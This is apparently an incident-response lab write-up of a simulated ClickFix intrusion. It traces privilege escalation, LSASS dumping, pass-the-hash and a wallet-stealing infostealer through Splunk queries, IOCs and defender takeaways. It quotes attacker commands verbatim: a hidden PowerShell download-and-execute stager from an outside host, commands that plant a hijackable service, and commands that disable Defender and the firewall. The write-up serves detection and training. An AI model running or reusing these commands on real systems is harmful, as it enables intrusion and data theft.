ClickFix - VodkaStealer
Scenario
NextGen Financial Solutions’ SOC flagged anomalous PowerShell activity on an employee workstation during routine monitoring. Initial triage traced the activity to a legitimate external website compromised with a ClickFix overlay — a fake CAPTCHA verification prompt that silently copies a malicious command to the visitor’s clipboard and instructs them to paste it into the Windows Run dialog. Before the incident response team could contain the threat, the attacker had escalated privileges, moved laterally across the corporate network, and deployed a custom infostealer dubbed VodkaStealer on multiple endpoints. Evidence suggests sensitive data including browser credentials, cryptocurrency wallet files, and internal documents was collected, staged, and exfiltrated to an external server. Four hosts are in scope: PAYOPS-WS-04, BCHAIN-WS-11, COMP-FS-01, and DC01. Artifacts include Splunk log data from all hosts and Velociraptor disk collections.
Methodology
Environment Orientation
With 1.17 million events across four hosts, the first step was understanding the data distribution. PAYOPS-WS-04 dominated at 70,911 events — the initial victim machine. BCHAIN-WS-11 held 32,714, COMP-FS-01 4,721, and DC01 4,154. Source breakdown revealed Security logs at 97% of events with Sysmon sparse at 419 events total across all hosts. This meant heavy reliance on Security event IDs (4624, 4663, 4688, 5145) and TaskScheduler logs rather than Sysmon process telemetry for most of the investigation.
The disk artifacts are Velociraptor collections using the Windows.KapeFiles.Targets artifact set, collecting $MFT, $J (USN journal), $LogFile, browser data, and registry hives. File paths are URL-encoded under uploads/auto/C%3A/.
Initial Access — ClickFix Lure
The compromise began when NEXTGEN\n.hesham visited a website at 3.122.229.6 that had been injected with a ClickFix CAPTCHA overlay. The fake verification prompt instructs the victim to press Win+R and paste a command — the PowerShell stager is already sitting in the clipboard. There is no artefact of the lure text itself in the logs; the social engineering lives entirely on the compromised webpage. The clipboard delivers only the raw execution command.
The infection timestamp was established by searching for Sysmon EventCode 3 outbound connections from n.hesham, then narrowing to a two-minute window around the C2 beacon to find the parent process:
index=* host="PAYOPS-WS-04" EventCode=1 parent_process_name="explorer.exe"
explorer.exe as the parent process confirms the Run dialog as the execution vector — a browser or script parent would indicate a different delivery mechanism. The full command logged at 23:53:49 on 4/20/2026:
"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://3.122.229.6/payload.ps1')"
C2 Establishment
payload.ps1 downloaded and executed from 3.122.229.6, establishing an outbound C2 beacon to 100.52.249.75:443 via powershell.exe approximately 68 seconds after execution. The beacon was confirmed via Sysmon EventCode 3 filtering for n.hesham outbound connections:
index=* EventCode=3 "NEXTGEN\\n.hesham"
| table _time, dest_ip, DestinationPort, process_name
| sort _time asc
Privilege Escalation — Unquoted Service Path
With a low-privilege C2 shell on PAYOPS-WS-04, the attacker performed WMI service enumeration looking for unquoted paths. The command was recovered from Security logs by filtering for n.hesham activity with PathName in the CommandLine, narrowing the time window to 23:52–23:59 to cut through noise:
index="main" "NEXTGEN\\n.hesham" PAYOPS CommandLine="*PathName*"
The full enumeration command piped output through findstr filtering specifically for DataSync — indicating the attacker already knew what service to look for, or ran a targeted second pass after initial enumeration:
C:\Windows\system32\cmd.exe /C wmic service get name,pathname,startmode | findstr /i "DataSync"
The attacker did not exploit a pre-existing misconfiguration — they created the vulnerable service themselves. PSReadLine history for k.mostafa.admin on PAYOPS-WS-04 (recovered from the Velociraptor artifact at C:\Users\k.mostafa.admin\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt) revealed the full setup:
New-Item -ItemType Directory -Path "C:\Program Files\DataSync Pro\Sync Service" -Force
& $cscPath /target:exe /reference:System.ServiceProcess.dll /out:"C:\Program Files\DataSync Pro\Sync Service\datasync-svc.exe" C:\Temp\DataSyncService.cs
icacls "C:\Program Files\DataSync Pro" /grant "BUILTIN\Users:(OI)(CI)(M)" /T
sc.exe create "DataSyncPro" binPath= "C:\Program Files\DataSync Pro\Sync Service\datasync-svc.exe" start= auto
Set-MpPreference -DisableRealtimeMonitoring $true
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
csc.exe compiled a legitimate-looking C# Windows service binary on the fly. The icacls grant deliberately gave write access to C:\Program Files\DataSync Pro\ for all users, creating the exploitable surface. With the service path unquoted and containing spaces, Windows attempts to execute C:\Program Files\DataSync.exe before resolving the full DataSync Pro\Sync Service\datasync-svc.exe path. Sysmon EventCode 11 confirmed PowerShell.exe writing Sync.exe to C:\Program Files\DataSync Pro\ at 00:00:38:
A forced reboot followed 31 seconds later via shutdown /r /t 5 /f, triggering the DataSyncPro service on startup and executing Sync.exe as SYSTEM. The hijack re-ran payload.ps1 — confirmed by the identical ParentCommandLine in the post-reboot Sysmon event with CurrentDirectory: C:\Program Files\DataSync Pro\.
Post-reboot, rundll32.exe running as NT AUTHORITY\SYSTEM replaced powershell.exe as the C2 process, maintaining the encrypted HTTPS channel to 100.52.249.75:443. Using rundll32 as a C2 carrier blends into normal Windows process listings.
Credential Dumping — LSASS
With SYSTEM privileges, the C2 shell targeted LSASS for credential harvesting. Sysmon EventCode 10 (ProcessAccess) confirmed rundll32.exe as SYSTEM accessing lsass.exe with GrantedAccess=0x1010 — the standard Mimikatz read handle. The query that cut through CAPI2 noise:
index="*" PAYOPS "*lsass*" EventCode=10 "C:\\Windows\\system32\\rundll32"
| table _time, SourceImage, TargetImage, GrantedAccess, User
| sort _time asc
First LSASS access: 2026-04-21 00:16:52.
Lateral Movement — Pass-the-Hash
Credentials harvested from LSASS included the domain admin account k.mostafa.admin. Pass-the-hash lateral movement was identified simply by examining Security EventCode 4624 LogonType 3 events and inspecting the Target_User_Name field values — k.mostafa.admin stood out immediately against the machine accounts:
index="*" EventCode=4624 LogonType=3
k.mostafa.admin authenticated to COMP-FS-01 at 10.10.11.81, confirmed by the DC01 Security log showing the source IP:
Impacket psexec-style execution dropped 2fdb156.exe to \\10.10.11.81\ADMIN$ — the random hex filename in ADMIN$ is the signature of this technique. Confirmed via EventCode 7045 on COMP-FS-01:
index="*" host="COMP-FS-01" (EventCode=7045 OR EventCode=4697)
Splunk had no file deletion telemetry on COMP-FS-01 — the host lacked Sysmon file delete coverage and Security object deletion auditing was not enabled. The deletion timestamp was recovered from the NTFS USN journal ($J) from the Velociraptor collection, parsed with NTFS Log Tracker. The journal recorded File_Closed, File_Deleted for 2fdb156.exe at 00:30:47 — just two seconds after creation at 00:30:45, consistent with Impacket’s immediate cleanup pattern:
k.mostafa.admin also moved laterally to BCHAIN-WS-11 (10.10.11.206) using the same technique, dropping cc53f75.exe to ADMIN$ at 01:44 — confirmed via Suricata eve.json SMB logs, which provided network-layer coverage where Windows endpoint logging was insufficient.
Persistence — Scheduled Task
The attacker deployed persistence across all compromised hosts via a scheduled task masquerading as a legitimate DataSync maintenance job. Task creation events (EventCode 4698) with the TaskName field revealed two tasks:
index=* EventCode=4698
| table _time, host, TaskName, TaskContent, SubjectUserName
| sort _time asc
The primary task \NextGen\DataSync Update fired across all hosts. Expanding the TaskContent XML revealed the full execution context:
<Command>powershell.exe</Command>
<Arguments>-nop -w hidden -ep bypass -File C:\ProgramData\svc_update.ps1 -SkipChecks</Arguments>
<UserId>NT AUTHORITY\SYSTEM</UserId>
A secondary persistence mechanism appeared as \OneDrive Standalone Update Task-NEXTGEN\k.mostafa.admin — a OneDrive masquerade using the stolen admin account, providing redundancy if the primary task was detected. The scheduled task fired at 01:20 AM on 4/21/2026.
VodkaStealer Execution
The -SkipChecks flag bypasses Phase A of VodkaStealer’s pre-flight checks — designed for sandbox evasion via geo-IP and keyboard layout detection (exits on RU/BY). Phase B kills browser processes to unlock SQLite credential databases. EventCode 4689 confirmed msedge.exe and opera.exe terminated by k.mostafa.admin between 01:20 and 01:30:
index=* EventCode=4689 process="*edge*" OR process="*opera*"
Phase C creates a staging directory using the format sysinfo_{CountryCode}_{PublicIP}_{DDMMYYYYHHmm} in %TEMP%. The first execution on PAYOPS-WS-04 created C:\Windows\Temp\sysinfo_US_10.0.0.1_210420260133 at 01:33, confirmed via Sysmon EventCode 11:
index=* EventCode=11 TargetFilename="*temp*" "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell" host="PAYOPS-WS-04"
On BCHAIN-WS-11, the staging directory captured MetaMask wallet extension data from y.tarek\Wallets\MetaMask\ — exactly the target profile for a blockchain workstation. Phase D collects across eight sub-phases: installed software, system info, screenshots, Chromium browser data (Login Data, Cookies, Web Data, History) from Chrome/Edge/Brave/Opera/Vivaldi/Yandex, Firefox profiles (logins.json, key4.db), crypto wallet applications (Exodus, Electrum, Bitcoin Core, Coinomi), and browser wallet extensions (MetaMask, Phantom, TrustWallet, CoinbaseWallet).
Phase E stages everything into a ZIP archive and exfiltrates via raw TCP socket. The exfil server was identified by filtering external connections excluding known C2 and payload IPs:
index=* EventCode=3
NOT (dest_ip="10.*" OR dest_ip="172.*" OR dest_ip="192.168.*")
NOT dest_ip="100.52.249.75" NOT dest_ip="3.122.229.6"
| stats count by dest_ip, dest_port, host
| sort -count
PAYOPS-WS-04 exfiltrated to 165.245.213.184:8443. BCHAIN-WS-11 exfiltrated to the same IP on port 4444 — flagged by Sysmon with technique_name=Non-Standard Port.
The full VodkaStealer v2 script was recovered from PowerShell ScriptBlock logging (EventCode 4104) on BCHAIN-WS-11, where it had been captured in memory during execution. Six execution phases are defined: A (Pre-Flight), B (Browser Kill), C (Staging Directory), D (Data Collection), E (Exfiltration), F (Cleanup).
Attack Summary
| Phase | Action |
|---|---|
| Initial Access | n.hesham visits compromised site 3.122.229.6; ClickFix CAPTCHA delivers PowerShell stager via Win+R Run dialog |
| Execution | payload.ps1 executes; C2 beacon to 100.52.249.75:443 via powershell.exe at 23:54 |
| Discovery | WMI service enumeration: wmic service get name,pathname,startmode piped through findstr for DataSync |
| Defense Evasion | Defender real-time monitoring disabled; Windows Firewall disabled domain/public/private profiles |
| Privilege Escalation | Attacker creates DataSyncPro service with deliberately unquoted path; drops Sync.exe; forces reboot |
| Persistence (Pre-Creds) | rundll32.exe SYSTEM C2 beacon established post-reboot via service hijack |
| Credential Access | rundll32.exe opens lsass.exe GrantedAccess=0x1010 at 00:16:52; k.mostafa.admin harvested |
| Lateral Movement | PTH to COMP-FS-01 (10.10.11.81) and BCHAIN-WS-11 via Impacket psexec over ADMIN$ |
| Persistence | Scheduled task \NextGen\DataSync Update deploys svc_update.ps1 as SYSTEM across all hosts |
| Collection | VodkaStealer harvests browser credentials, crypto wallets, screenshots, system info from all user profiles |
| Exfiltration | Data ZIPped and sent raw TCP to 165.245.213.184:8443 (PAYOPS) and :4444 (BCHAIN) |
| Cleanup | Lateral movement binaries deleted within seconds; staging directories and ZIPs removed post-exfil |
IOCs
| Type | Value |
|---|---|
| IP (Compromised Site / Payload Host) | 3[.]122[.]229[.]6 |
| IP (C2 Server) | 100[.]52[.]249[.]75 |
| IP (Exfil Server) | 165[.]245[.]213[.]184 |
| IP (File Server) | 10[.]10[.]11[.]81 |
| IP (BCHAIN Workstation) | 10[.]10[.]11[.]206 |
| URL (Initial Payload) | hxxp[://]3[.]122[.]229[.]6/payload[.]ps1 |
| File | payload.ps1 |
| File | Sync.exe |
| File | svc_update.ps1 |
| File | 2fdb156.exe |
| File | cc53f75.exe |
| Scheduled Task | \NextGen\DataSync Update |
| Scheduled Task | \OneDrive Standalone Update Task-NEXTGEN\k.mostafa.admin |
| Account (Compromised Domain Admin) | NEXTGEN\k.mostafa.admin |
| Account (Initial Victim) | NEXTGEN\n.hesham |
| Staging Dir Pattern | C:\Windows\Temp\sysinfo_{CC}{IP}{DDMMYYYYHHmm} |
| Exfil Port (PAYOPS-WS-04) | 8443 |
| Exfil Port (BCHAIN-WS-11) | 4444 |
MITRE ATT&CK
| Technique | ID | Description |
|---|---|---|
| User Execution: Malicious File | T1204.002 | User pastes ClickFix PowerShell command into Win+R Run dialog |
| PowerShell | T1059.001 | payload.ps1 and svc_update.ps1 executed via hidden PowerShell |
| Hijack Execution Flow: Unquoted Service Path | T1574.009 | Sync.exe placed at C:\Program Files\DataSync.exe to intercept DataSyncPro service startup |
| OS Credential Dumping: LSASS Memory | T1003.001 | rundll32.exe as SYSTEM opens lsass.exe with GrantedAccess=0x1010 |
| Use Alternate Authentication Material: Pass the Hash | T1550.002 | k.mostafa.admin NTLM hash used for lateral movement to COMP-FS-01 and BCHAIN-WS-11 |
| Remote Services: SMB/Windows Admin Shares | T1021.002 | Impacket psexec drops binaries via ADMIN$ share to both lateral movement targets |
| Scheduled Task/Job: Scheduled Task | T1053.005 | \NextGen\DataSync Update persistence deployed across all compromised hosts |
| Credentials from Password Stores: Web Browsers | T1555.003 | VodkaStealer harvests Login Data, Cookies from Chrome, Edge, Opera across all user profiles |
| Exfiltration Over C2 Channel | T1041 | Raw TCP socket exfil to 165.245.213.184 on ports 8443 and 4444 |
| Indicator Removal: File Deletion | T1070.004 | Lateral movement binaries deleted within seconds of execution; staging dirs cleaned post-exfil |
| Masquerading: Match Legitimate Name | T1036.005 | Scheduled task name mimics DataSync maintenance job; secondary task mimics OneDrive updater |
| Impair Defenses: Disable or Modify Tools | T1562.001 | Defender real-time monitoring and Windows Firewall disabled via PowerShell |
Defender Takeaways
ClickFix requires updated awareness training. The entire initial access chain required zero technical exploitation — the victim pasted the attacker’s command into their own Run dialog. Standard phishing training covering malicious links and attachments does not address clipboard-based delivery. Security awareness programs need to explicitly cover the ClickFix pattern: no legitimate website or CAPTCHA will ever ask you to run a command on your own machine.
Audit and quote all service paths with spaces. The DataSyncPro service was created with a deliberately unquoted path, but this class of misconfiguration exists in many real environments due to legacy software installers. Auditing all services with wmic service get name,pathname,startmode | findstr /i " " and quoting all paths containing spaces eliminates the hijack surface entirely. The attacker also granted write access to C:\Program Files\DataSync Pro\ for all users — file permission auditing on service directories is equally important.
Scheduled task creation needs active alerting. The \NextGen\DataSync Update task name was convincing enough to blend into a legitimate maintenance schedule. EventCode 4698 (scheduled task creation) with alerting on tasks executing from C:\ProgramData\, C:\Windows\Temp\, or any SYSTEM-context PowerShell with -ep bypass provides reliable detection for this persistence pattern regardless of how well the task name is disguised.
Deploy Sysmon uniformly — file server gaps cost investigation time. COMP-FS-01 had no Sysmon file deletion telemetry, requiring USN journal analysis via NTFS Log Tracker to recover the 2fdb156.exe deletion timestamp. The journal had the answer but parsing it was not the intended fast path. Full Sysmon deployment including EventID 11 (FileCreate) and EventID 23 (FileDelete) across all hosts — not just workstations — closes this gap and keeps investigations in a single pane.
Suricata SMB logs fill endpoint blind spots. The eve.json SMB telemetry was the only source that confirmed cc53f75.exe activity on BCHAIN-WS-11 when Windows Security and Sysmon logs were insufficient. Network-layer logging via Suricata with SMB protocol inspection provides coverage independent of endpoint agent deployment and is particularly valuable for lateral movement via admin shares.